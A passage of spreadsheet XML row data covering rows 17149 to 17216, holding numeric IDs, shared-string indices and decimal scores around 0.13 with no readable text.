      <c r="A17149" s="1">
        <v>7539.0</v>
      </c>
      <c r="B17149" s="2">
        <v>5.1470923E7</v>
      </c>
      <c r="C17149" s="2" t="s">
        <v>16534</v>
      </c>
      <c r="D17149" s="2">
        <v>1.0</v>
      </c>
      <c r="E17149" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17149" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17150" ht="15.75" customHeight="1">
      <c r="A17150" s="1">
        <v>8103.0</v>
      </c>
      <c r="B17150" s="2">
        <v>5.3062752E7</v>
      </c>
      <c r="C17150" s="2" t="s">
        <v>16535</v>
      </c>
      <c r="D17150" s="2">
        <v>1.0</v>
      </c>
      <c r="E17150" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17150" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17151" ht="15.75" customHeight="1">
      <c r="A17151" s="1">
        <v>9380.0</v>
      </c>
      <c r="B17151" s="2">
        <v>5.5726124E7</v>
      </c>
      <c r="C17151" s="2" t="s">
        <v>16536</v>
      </c>
      <c r="D17151" s="2">
        <v>1.0</v>
      </c>
      <c r="E17151" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17151" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17152" ht="15.75" customHeight="1">
      <c r="A17152" s="1">
        <v>10654.0</v>
      </c>
      <c r="B17152" s="2">
        <v>1.4201393E7</v>
      </c>
      <c r="C17152" s="2" t="s">
        <v>16537</v>
      </c>
      <c r="D17152" s="2">
        <v>1.0</v>
      </c>
      <c r="E17152" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17152" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17153" ht="15.75" customHeight="1">
      <c r="A17153" s="1">
        <v>10811.0</v>
      </c>
      <c r="B17153" s="2">
        <v>1.585936E7</v>
      </c>
      <c r="C17153" s="2" t="s">
        <v>16538</v>
      </c>
      <c r="D17153" s="2">
        <v>1.0</v>
      </c>
      <c r="E17153" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17153" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17154" ht="15.75" customHeight="1">
      <c r="A17154" s="1">
        <v>11986.0</v>
      </c>
      <c r="B17154" s="2">
        <v>2.5853405E7</v>
      </c>
      <c r="C17154" s="2" t="s">
        <v>16539</v>
      </c>
      <c r="D17154" s="2">
        <v>1.0</v>
      </c>
      <c r="E17154" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17154" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17155" ht="15.75" customHeight="1">
      <c r="A17155" s="1">
        <v>11987.0</v>
      </c>
      <c r="B17155" s="2">
        <v>2.5853405E7</v>
      </c>
      <c r="C17155" s="2" t="s">
        <v>16540</v>
      </c>
      <c r="D17155" s="2">
        <v>1.0</v>
      </c>
      <c r="E17155" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17155" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17156" ht="15.75" customHeight="1">
      <c r="A17156" s="1">
        <v>12445.0</v>
      </c>
      <c r="B17156" s="2">
        <v>2929614.0</v>
      </c>
      <c r="C17156" s="2" t="s">
        <v>16541</v>
      </c>
      <c r="D17156" s="2">
        <v>1.0</v>
      </c>
      <c r="E17156" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17156" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17157" ht="15.75" customHeight="1">
      <c r="A17157" s="1">
        <v>14261.0</v>
      </c>
      <c r="B17157" s="2">
        <v>3.8390159E7</v>
      </c>
      <c r="C17157" s="2" t="s">
        <v>16542</v>
      </c>
      <c r="D17157" s="2">
        <v>1.0</v>
      </c>
      <c r="E17157" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17157" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17158" ht="15.75" customHeight="1">
      <c r="A17158" s="1">
        <v>14532.0</v>
      </c>
      <c r="B17158" s="2">
        <v>3983019.0</v>
      </c>
      <c r="C17158" s="2" t="s">
        <v>16543</v>
      </c>
      <c r="D17158" s="2">
        <v>1.0</v>
      </c>
      <c r="E17158" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17158" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17159" ht="15.75" customHeight="1">
      <c r="A17159" s="1">
        <v>14569.0</v>
      </c>
      <c r="B17159" s="2">
        <v>4.006087E7</v>
      </c>
      <c r="C17159" s="2" t="s">
        <v>16544</v>
      </c>
      <c r="D17159" s="2">
        <v>1.0</v>
      </c>
      <c r="E17159" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17159" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17160" ht="15.75" customHeight="1">
      <c r="A17160" s="1">
        <v>15904.0</v>
      </c>
      <c r="B17160" s="2">
        <v>4.4628444E7</v>
      </c>
      <c r="C17160" s="2" t="s">
        <v>16545</v>
      </c>
      <c r="D17160" s="2">
        <v>1.0</v>
      </c>
      <c r="E17160" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17160" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17161" ht="15.75" customHeight="1">
      <c r="A17161" s="1">
        <v>16197.0</v>
      </c>
      <c r="B17161" s="2">
        <v>4.5661419E7</v>
      </c>
      <c r="C17161" s="2" t="s">
        <v>16546</v>
      </c>
      <c r="D17161" s="2">
        <v>1.0</v>
      </c>
      <c r="E17161" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17161" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17162" ht="15.75" customHeight="1">
      <c r="A17162" s="1">
        <v>16595.0</v>
      </c>
      <c r="B17162" s="2">
        <v>4.7002628E7</v>
      </c>
      <c r="C17162" s="2" t="s">
        <v>16547</v>
      </c>
      <c r="D17162" s="2">
        <v>1.0</v>
      </c>
      <c r="E17162" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17162" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17163" ht="15.75" customHeight="1">
      <c r="A17163" s="1">
        <v>17197.0</v>
      </c>
      <c r="B17163" s="2">
        <v>4.8966096E7</v>
      </c>
      <c r="C17163" s="2" t="s">
        <v>16548</v>
      </c>
      <c r="D17163" s="2">
        <v>1.0</v>
      </c>
      <c r="E17163" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17163" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17164" ht="15.75" customHeight="1">
      <c r="A17164" s="1">
        <v>19478.0</v>
      </c>
      <c r="B17164" s="2">
        <v>5.585117E7</v>
      </c>
      <c r="C17164" s="2" t="s">
        <v>16549</v>
      </c>
      <c r="D17164" s="2">
        <v>1.0</v>
      </c>
      <c r="E17164" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17164" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17165" ht="15.75" customHeight="1">
      <c r="A17165" s="1">
        <v>19946.0</v>
      </c>
      <c r="B17165" s="2">
        <v>5.7495651E7</v>
      </c>
      <c r="C17165" s="2" t="s">
        <v>16550</v>
      </c>
      <c r="D17165" s="2">
        <v>1.0</v>
      </c>
      <c r="E17165" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17165" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17166" ht="15.75" customHeight="1">
      <c r="A17166" s="1">
        <v>20226.0</v>
      </c>
      <c r="B17166" s="2">
        <v>1.0783158E7</v>
      </c>
      <c r="C17166" s="2" t="s">
        <v>16551</v>
      </c>
      <c r="D17166" s="2">
        <v>1.0</v>
      </c>
      <c r="E17166" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17166" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17167" ht="15.75" customHeight="1">
      <c r="A17167" s="1">
        <v>21617.0</v>
      </c>
      <c r="B17167" s="2">
        <v>2.4567952E7</v>
      </c>
      <c r="C17167" s="2" t="s">
        <v>16552</v>
      </c>
      <c r="D17167" s="2">
        <v>1.0</v>
      </c>
      <c r="E17167" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17167" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17168" ht="15.75" customHeight="1">
      <c r="A17168" s="1">
        <v>21833.0</v>
      </c>
      <c r="B17168" s="2">
        <v>2.7007106E7</v>
      </c>
      <c r="C17168" s="2" t="s">
        <v>16553</v>
      </c>
      <c r="D17168" s="2">
        <v>1.0</v>
      </c>
      <c r="E17168" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17168" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17169" ht="15.75" customHeight="1">
      <c r="A17169" s="1">
        <v>22846.0</v>
      </c>
      <c r="B17169" s="2">
        <v>4.6779771E7</v>
      </c>
      <c r="C17169" s="2" t="s">
        <v>16554</v>
      </c>
      <c r="D17169" s="2">
        <v>1.0</v>
      </c>
      <c r="E17169" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17169" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17170" ht="15.75" customHeight="1">
      <c r="A17170" s="1">
        <v>23605.0</v>
      </c>
      <c r="B17170" s="2">
        <v>6405535.0</v>
      </c>
      <c r="C17170" s="2" t="s">
        <v>16555</v>
      </c>
      <c r="D17170" s="2">
        <v>1.0</v>
      </c>
      <c r="E17170" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17170" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17171" ht="15.75" customHeight="1">
      <c r="A17171" s="1">
        <v>25353.0</v>
      </c>
      <c r="B17171" s="2">
        <v>1.3553041E7</v>
      </c>
      <c r="C17171" s="2" t="s">
        <v>16556</v>
      </c>
      <c r="D17171" s="2">
        <v>1.0</v>
      </c>
      <c r="E17171" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17171" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17172" ht="15.75" customHeight="1">
      <c r="A17172" s="1">
        <v>25775.0</v>
      </c>
      <c r="B17172" s="2">
        <v>1.4652074E7</v>
      </c>
      <c r="C17172" s="2" t="s">
        <v>16557</v>
      </c>
      <c r="D17172" s="2">
        <v>1.0</v>
      </c>
      <c r="E17172" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17172" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17173" ht="15.75" customHeight="1">
      <c r="A17173" s="1">
        <v>25941.0</v>
      </c>
      <c r="B17173" s="2">
        <v>1.5230907E7</v>
      </c>
      <c r="C17173" s="2" t="s">
        <v>16558</v>
      </c>
      <c r="D17173" s="2">
        <v>1.0</v>
      </c>
      <c r="E17173" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17173" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17174" ht="15.75" customHeight="1">
      <c r="A17174" s="1">
        <v>26267.0</v>
      </c>
      <c r="B17174" s="2">
        <v>1.6377141E7</v>
      </c>
      <c r="C17174" s="2" t="s">
        <v>16559</v>
      </c>
      <c r="D17174" s="2">
        <v>1.0</v>
      </c>
      <c r="E17174" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17174" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17175" ht="15.75" customHeight="1">
      <c r="A17175" s="1">
        <v>26647.0</v>
      </c>
      <c r="B17175" s="2">
        <v>1.8048644E7</v>
      </c>
      <c r="C17175" s="2" t="s">
        <v>16560</v>
      </c>
      <c r="D17175" s="2">
        <v>1.0</v>
      </c>
      <c r="E17175" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17175" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17176" ht="15.75" customHeight="1">
      <c r="A17176" s="1">
        <v>27607.0</v>
      </c>
      <c r="B17176" s="2">
        <v>2.2631531E7</v>
      </c>
      <c r="C17176" s="2" t="s">
        <v>16561</v>
      </c>
      <c r="D17176" s="2">
        <v>1.0</v>
      </c>
      <c r="E17176" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17176" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17177" ht="15.75" customHeight="1">
      <c r="A17177" s="1">
        <v>27630.0</v>
      </c>
      <c r="B17177" s="2">
        <v>2.270865E7</v>
      </c>
      <c r="C17177" s="2" t="s">
        <v>16562</v>
      </c>
      <c r="D17177" s="2">
        <v>1.0</v>
      </c>
      <c r="E17177" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17177" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17178" ht="15.75" customHeight="1">
      <c r="A17178" s="1">
        <v>27858.0</v>
      </c>
      <c r="B17178" s="2">
        <v>2.3429009E7</v>
      </c>
      <c r="C17178" s="2" t="s">
        <v>16563</v>
      </c>
      <c r="D17178" s="2">
        <v>1.0</v>
      </c>
      <c r="E17178" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17178" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17179" ht="15.75" customHeight="1">
      <c r="A17179" s="1">
        <v>28052.0</v>
      </c>
      <c r="B17179" s="2">
        <v>2.4567951E7</v>
      </c>
      <c r="C17179" s="2" t="s">
        <v>16564</v>
      </c>
      <c r="D17179" s="2">
        <v>1.0</v>
      </c>
      <c r="E17179" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17179" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17180" ht="15.75" customHeight="1">
      <c r="A17180" s="1">
        <v>31584.0</v>
      </c>
      <c r="B17180" s="2">
        <v>5128684.0</v>
      </c>
      <c r="C17180" s="2" t="s">
        <v>16565</v>
      </c>
      <c r="D17180" s="2">
        <v>1.0</v>
      </c>
      <c r="E17180" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17180" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17181" ht="15.75" customHeight="1">
      <c r="A17181" s="1">
        <v>31674.0</v>
      </c>
      <c r="B17181" s="2">
        <v>5187255.0</v>
      </c>
      <c r="C17181" s="2" t="s">
        <v>16566</v>
      </c>
      <c r="D17181" s="2">
        <v>1.0</v>
      </c>
      <c r="E17181" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17181" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17182" ht="15.75" customHeight="1">
      <c r="A17182" s="1">
        <v>31704.0</v>
      </c>
      <c r="B17182" s="2">
        <v>5.1976531E7</v>
      </c>
      <c r="C17182" s="2" t="s">
        <v>16567</v>
      </c>
      <c r="D17182" s="2">
        <v>1.0</v>
      </c>
      <c r="E17182" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17182" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17183" ht="15.75" customHeight="1">
      <c r="A17183" s="1">
        <v>31741.0</v>
      </c>
      <c r="B17183" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C17183" s="2" t="s">
        <v>16568</v>
      </c>
      <c r="D17183" s="2">
        <v>1.0</v>
      </c>
      <c r="E17183" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17183" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17184" ht="15.75" customHeight="1">
      <c r="A17184" s="1">
        <v>31908.0</v>
      </c>
      <c r="B17184" s="2">
        <v>5299202.0</v>
      </c>
      <c r="C17184" s="2" t="s">
        <v>16569</v>
      </c>
      <c r="D17184" s="2">
        <v>1.0</v>
      </c>
      <c r="E17184" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17184" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17185" ht="15.75" customHeight="1">
      <c r="A17185" s="1">
        <v>33475.0</v>
      </c>
      <c r="B17185" s="2">
        <v>7985095.0</v>
      </c>
      <c r="C17185" s="2" t="s">
        <v>16570</v>
      </c>
      <c r="D17185" s="2">
        <v>1.0</v>
      </c>
      <c r="E17185" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17185" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17186" ht="15.75" customHeight="1">
      <c r="A17186" s="1">
        <v>34230.0</v>
      </c>
      <c r="B17186" s="2">
        <v>4729667.0</v>
      </c>
      <c r="C17186" s="2" t="s">
        <v>16571</v>
      </c>
      <c r="D17186" s="2">
        <v>1.0</v>
      </c>
      <c r="E17186" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17186" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="17187" ht="15.75" customHeight="1">
      <c r="A17187" s="1">
        <v>14124.0</v>
      </c>
      <c r="B17187" s="2">
        <v>3.7847027E7</v>
      </c>
      <c r="C17187" s="2" t="s">
        <v>16572</v>
      </c>
      <c r="D17187" s="2">
        <v>1.0</v>
      </c>
      <c r="E17187" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17187" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="17188" ht="15.75" customHeight="1">
      <c r="A17188" s="1">
        <v>28001.0</v>
      </c>
      <c r="B17188" s="2">
        <v>2.4279076E7</v>
      </c>
      <c r="C17188" s="2" t="s">
        <v>16573</v>
      </c>
      <c r="D17188" s="2">
        <v>1.0</v>
      </c>
      <c r="E17188" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17188" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="17189" ht="15.75" customHeight="1">
      <c r="A17189" s="1">
        <v>10764.0</v>
      </c>
      <c r="B17189" s="2">
        <v>1.5591021E7</v>
      </c>
      <c r="C17189" s="2" t="s">
        <v>16574</v>
      </c>
      <c r="D17189" s="2">
        <v>1.0</v>
      </c>
      <c r="E17189" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17189" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="17190" ht="15.75" customHeight="1">
      <c r="A17190" s="1">
        <v>20532.0</v>
      </c>
      <c r="B17190" s="2">
        <v>1.3213954E7</v>
      </c>
      <c r="C17190" s="2" t="s">
        <v>16575</v>
      </c>
      <c r="D17190" s="2">
        <v>1.0</v>
      </c>
      <c r="E17190" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17190" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="17191" ht="15.75" customHeight="1">
      <c r="A17191" s="1">
        <v>21119.0</v>
      </c>
      <c r="B17191" s="2">
        <v>1.8298107E7</v>
      </c>
      <c r="C17191" s="2" t="s">
        <v>16576</v>
      </c>
      <c r="D17191" s="2">
        <v>1.0</v>
      </c>
      <c r="E17191" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17191" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="17192" ht="15.75" customHeight="1">
      <c r="A17192" s="1">
        <v>33533.0</v>
      </c>
      <c r="B17192" s="2">
        <v>8137495.0</v>
      </c>
      <c r="C17192" s="2" t="s">
        <v>16577</v>
      </c>
      <c r="D17192" s="2">
        <v>1.0</v>
      </c>
      <c r="E17192" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17192" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="17193" ht="15.75" customHeight="1">
      <c r="A17193" s="1">
        <v>28050.0</v>
      </c>
      <c r="B17193" s="2">
        <v>2.4567951E7</v>
      </c>
      <c r="C17193" s="2" t="s">
        <v>16578</v>
      </c>
      <c r="D17193" s="2">
        <v>1.0</v>
      </c>
      <c r="E17193" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17193" s="2">
        <v>0.1299603174603174</v>
      </c>
    </row>
    <row r="17194" ht="15.75" customHeight="1">
      <c r="A17194" s="1">
        <v>7578.0</v>
      </c>
      <c r="B17194" s="2">
        <v>5.1592497E7</v>
      </c>
      <c r="C17194" s="2" t="s">
        <v>16579</v>
      </c>
      <c r="D17194" s="2">
        <v>1.0</v>
      </c>
      <c r="E17194" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17194" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="17195" ht="15.75" customHeight="1">
      <c r="A17195" s="1">
        <v>27616.0</v>
      </c>
      <c r="B17195" s="2">
        <v>2.2671206E7</v>
      </c>
      <c r="C17195" s="2" t="s">
        <v>16580</v>
      </c>
      <c r="D17195" s="2">
        <v>1.0</v>
      </c>
      <c r="E17195" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17195" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="17196" ht="15.75" customHeight="1">
      <c r="A17196" s="1">
        <v>3157.0</v>
      </c>
      <c r="B17196" s="2">
        <v>3.7002058E7</v>
      </c>
      <c r="C17196" s="2" t="s">
        <v>16581</v>
      </c>
      <c r="D17196" s="2">
        <v>1.0</v>
      </c>
      <c r="E17196" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17196" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="17197" ht="15.75" customHeight="1">
      <c r="A17197" s="1">
        <v>14265.0</v>
      </c>
      <c r="B17197" s="2">
        <v>3839812.0</v>
      </c>
      <c r="C17197" s="2" t="s">
        <v>16582</v>
      </c>
      <c r="D17197" s="2">
        <v>1.0</v>
      </c>
      <c r="E17197" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17197" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="17198" ht="15.75" customHeight="1">
      <c r="A17198" s="1">
        <v>14840.0</v>
      </c>
      <c r="B17198" s="2">
        <v>4.1036244E7</v>
      </c>
      <c r="C17198" s="2" t="s">
        <v>16583</v>
      </c>
      <c r="D17198" s="2">
        <v>1.0</v>
      </c>
      <c r="E17198" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17198" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="17199" ht="15.75" customHeight="1">
      <c r="A17199" s="1">
        <v>20134.0</v>
      </c>
      <c r="B17199" s="2">
        <v>1.0099847E7</v>
      </c>
      <c r="C17199" s="2" t="s">
        <v>16584</v>
      </c>
      <c r="D17199" s="2">
        <v>1.0</v>
      </c>
      <c r="E17199" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17199" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="17200" ht="15.75" customHeight="1">
      <c r="A17200" s="1">
        <v>20555.0</v>
      </c>
      <c r="B17200" s="2">
        <v>1.3389111E7</v>
      </c>
      <c r="C17200" s="2" t="s">
        <v>16585</v>
      </c>
      <c r="D17200" s="2">
        <v>1.0</v>
      </c>
      <c r="E17200" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17200" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="17201" ht="15.75" customHeight="1">
      <c r="A17201" s="1">
        <v>20884.0</v>
      </c>
      <c r="B17201" s="2">
        <v>1.6097612E7</v>
      </c>
      <c r="C17201" s="2" t="s">
        <v>16586</v>
      </c>
      <c r="D17201" s="2">
        <v>1.0</v>
      </c>
      <c r="E17201" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17201" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="17202" ht="15.75" customHeight="1">
      <c r="A17202" s="1">
        <v>25263.0</v>
      </c>
      <c r="B17202" s="2">
        <v>1.338911E7</v>
      </c>
      <c r="C17202" s="2" t="s">
        <v>16585</v>
      </c>
      <c r="D17202" s="2">
        <v>1.0</v>
      </c>
      <c r="E17202" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17202" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="17203" ht="15.75" customHeight="1">
      <c r="A17203" s="1">
        <v>25810.0</v>
      </c>
      <c r="B17203" s="2">
        <v>1.4748081E7</v>
      </c>
      <c r="C17203" s="2" t="s">
        <v>16587</v>
      </c>
      <c r="D17203" s="2">
        <v>1.0</v>
      </c>
      <c r="E17203" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17203" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="17204" ht="15.75" customHeight="1">
      <c r="A17204" s="1">
        <v>26161.0</v>
      </c>
      <c r="B17204" s="2">
        <v>1.6097611E7</v>
      </c>
      <c r="C17204" s="2" t="s">
        <v>16586</v>
      </c>
      <c r="D17204" s="2">
        <v>1.0</v>
      </c>
      <c r="E17204" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17204" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="17205" ht="15.75" customHeight="1">
      <c r="A17205" s="1">
        <v>26724.0</v>
      </c>
      <c r="B17205" s="2">
        <v>1.824821E7</v>
      </c>
      <c r="C17205" s="2" t="s">
        <v>16588</v>
      </c>
      <c r="D17205" s="2">
        <v>1.0</v>
      </c>
      <c r="E17205" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17205" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="17206" ht="15.75" customHeight="1">
      <c r="A17206" s="1">
        <v>27049.0</v>
      </c>
      <c r="B17206" s="2">
        <v>2.031696E7</v>
      </c>
      <c r="C17206" s="2" t="s">
        <v>16589</v>
      </c>
      <c r="D17206" s="2">
        <v>1.0</v>
      </c>
      <c r="E17206" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17206" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="17207" ht="15.75" customHeight="1">
      <c r="A17207" s="1">
        <v>28713.0</v>
      </c>
      <c r="B17207" s="2">
        <v>2.7827713E7</v>
      </c>
      <c r="C17207" s="2" t="s">
        <v>16590</v>
      </c>
      <c r="D17207" s="2">
        <v>1.0</v>
      </c>
      <c r="E17207" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17207" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="17208" ht="15.75" customHeight="1">
      <c r="A17208" s="1">
        <v>32016.0</v>
      </c>
      <c r="B17208" s="2">
        <v>5.3488065E7</v>
      </c>
      <c r="C17208" s="2" t="s">
        <v>16380</v>
      </c>
      <c r="D17208" s="2">
        <v>1.0</v>
      </c>
      <c r="E17208" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17208" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="17209" ht="15.75" customHeight="1">
      <c r="A17209" s="1">
        <v>32187.0</v>
      </c>
      <c r="B17209" s="2">
        <v>5472520.0</v>
      </c>
      <c r="C17209" s="2" t="s">
        <v>16591</v>
      </c>
      <c r="D17209" s="2">
        <v>1.0</v>
      </c>
      <c r="E17209" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17209" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="17210" ht="15.75" customHeight="1">
      <c r="A17210" s="1">
        <v>28550.0</v>
      </c>
      <c r="B17210" s="2">
        <v>2.6861579E7</v>
      </c>
      <c r="C17210" s="2" t="s">
        <v>16592</v>
      </c>
      <c r="D17210" s="2">
        <v>1.0</v>
      </c>
      <c r="E17210" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17210" s="2">
        <v>0.1293103448275863</v>
      </c>
    </row>
    <row r="17211" ht="15.75" customHeight="1">
      <c r="A17211" s="1">
        <v>20229.0</v>
      </c>
      <c r="B17211" s="2">
        <v>1.0787611E7</v>
      </c>
      <c r="C17211" s="2" t="s">
        <v>16593</v>
      </c>
      <c r="D17211" s="2">
        <v>1.0</v>
      </c>
      <c r="E17211" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17211" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="17212" ht="15.75" customHeight="1">
      <c r="A17212" s="1">
        <v>25068.0</v>
      </c>
      <c r="B17212" s="2">
        <v>1.2875858E7</v>
      </c>
      <c r="C17212" s="2" t="s">
        <v>16594</v>
      </c>
      <c r="D17212" s="2">
        <v>1.0</v>
      </c>
      <c r="E17212" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17212" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="17213" ht="15.75" customHeight="1">
      <c r="A17213" s="1">
        <v>34180.0</v>
      </c>
      <c r="B17213" s="2">
        <v>9939900.0</v>
      </c>
      <c r="C17213" s="2" t="s">
        <v>16595</v>
      </c>
      <c r="D17213" s="2">
        <v>1.0</v>
      </c>
      <c r="E17213" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17213" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="17214" ht="15.75" customHeight="1">
      <c r="A17214" s="1">
        <v>14739.0</v>
      </c>
      <c r="B17214" s="2">
        <v>4.07039E7</v>
      </c>
      <c r="C17214" s="2" t="s">
        <v>16596</v>
      </c>
      <c r="D17214" s="2">
        <v>1.0</v>
      </c>
      <c r="E17214" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17214" s="2">
        <v>0.1291079812206573</v>
      </c>
    </row>
    <row r="17215" ht="15.75" customHeight="1">
      <c r="A17215" s="1">
        <v>625.0</v>
      </c>
      <c r="B17215" s="2">
        <v>1.9568548E7</v>
      </c>
      <c r="C17215" s="2" t="s">
        <v>16597</v>
      </c>
      <c r="D17215" s="2">
        <v>1.0</v>
      </c>
      <c r="E17215" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17215" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="17216" ht="15.75" customHeight="1">
      <c r="A17216" s="1">
        <v>9543.0</v>
